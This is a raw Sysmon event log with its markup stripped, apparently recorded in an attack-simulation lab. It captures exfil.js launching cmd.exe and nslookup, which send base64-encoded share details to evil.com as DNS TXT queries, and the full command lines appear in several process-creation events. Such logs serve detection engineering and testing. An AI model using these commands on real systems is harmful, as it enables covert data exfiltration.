10341000x8000000000000000194142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.329{2E1864BB-17A5-629A-A93D-000000005F02}78766488C:\Windows\system32\cmd.exe{2E1864BB-17A5-629A-AB3D-000000005F02}5392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.344{2E1864BB-17A5-629A-AB3D-000000005F02}5392C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A5-629A-A93D-000000005F02}7876C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmri.tmp 2>&1 10341000x8000000000000000194140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.313{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-AA3D-000000005F02}1292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.313{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-AA3D-000000005F02}1292C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.313{2E1864BB-17A5-629A-AA3D-000000005F02}1292660C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-A93D-000000005F02}7876C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.298{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-AA3D-000000005F02}1292C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000194136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.298{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C6FBF151891AC088CC3D41331EBC7F6,SHA256=CFD26BC6FEE82C6308D951991277D118ADFFBE246BA4A5C744AB868DDD8B2E6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.276{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.276{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.276{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.276{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.276{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-A93D-000000005F02}7876C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.276{2E1864BB-17A1-629A-783D-000000005F02}55525740C:\Windows\System32\WScript.exe{2E1864BB-17A5-629A-A93D-000000005F02}7876C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.291{2E1864BB-17A5-629A-A93D-000000005F02}7876C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmri.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.276{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsmxwj.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000194127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.433{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52078- 354300x8000000000000000194126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.433{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52077- 354300x8000000000000000194125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.432{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52076- 354300x8000000000000000194124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.432{00000000-0000-0000-0000-000000000000}4832<unknown process>-udptruefalse127.0.0.1-52076-false127.0.0.1-53domain 354300x8000000000000000194123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.235{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52075- 354300x8000000000000000194122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.235{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52074- 354300x8000000000000000194121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.234{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52073- 354300x8000000000000000194120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.234{00000000-0000-0000-0000-000000000000}5216<unknown process>-udptruefalse127.0.0.1-52073-false127.0.0.1-53domain 354300x8000000000000000194119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.047{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60943-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000194118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.047{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52072- 354300x8000000000000000194117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.047{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52071- 354300x8000000000000000194116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.046{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52070- 354300x8000000000000000194115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:03.046{00000000-0000-0000-0000-000000000000}7644<unknown process>-udptruefalse127.0.0.1-52070-false127.0.0.1-53domain 10341000x8000000000000000194114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.230{2E1864BB-17A5-629A-A73D-000000005F02}45364632C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-A83D-000000005F02}7392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.230{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.230{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.214{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.214{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.214{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-A83D-000000005F02}7392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.214{2E1864BB-17A5-629A-A63D-000000005F02}73167476C:\Windows\system32\cmd.exe{2E1864BB-17A5-629A-A83D-000000005F02}7392C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.228{2E1864BB-17A5-629A-A83D-000000005F02}7392C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A5-629A-A63D-000000005F02}7316C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsmxwj.tmp 2>&1 10341000x8000000000000000194106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.198{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-A73D-000000005F02}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.198{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A5-629A-A73D-000000005F02}4536C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.198{2E1864BB-17A5-629A-A73D-000000005F02}45364632C:\Windows\system32\conhost.exe{2E1864BB-17A5-629A-A63D-000000005F02}7316C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.192{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A5-629A-A73D-000000005F02}4536C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:05.176{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 